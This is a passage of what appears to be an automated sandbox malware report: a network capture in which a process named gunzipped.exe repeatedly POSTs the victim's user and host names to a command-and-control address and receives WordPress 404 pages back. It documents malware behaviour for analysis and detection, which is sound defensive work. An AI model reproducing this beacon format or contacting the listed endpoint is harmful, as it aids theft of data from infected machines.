2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:11.345755100 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:11.345793962 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:11.345834017 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:11.345874071 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:11.345912933 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:11.345952988 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:11.345993042 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:11.346030951 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:11.346071005 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49725	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:11.695406914 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:11.898840904 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:12.797817945 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:11 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:12.797883034 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:12.797921896 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:12.797960997 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:12.798002958 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:12.798041105 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:12.798079014 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:12.798115969 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:12.798152924 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:12.798193932 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49726	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:13.162928104 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:13.367156029 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:14.294023991 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:13 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:14.294083118 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:14.294121027 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
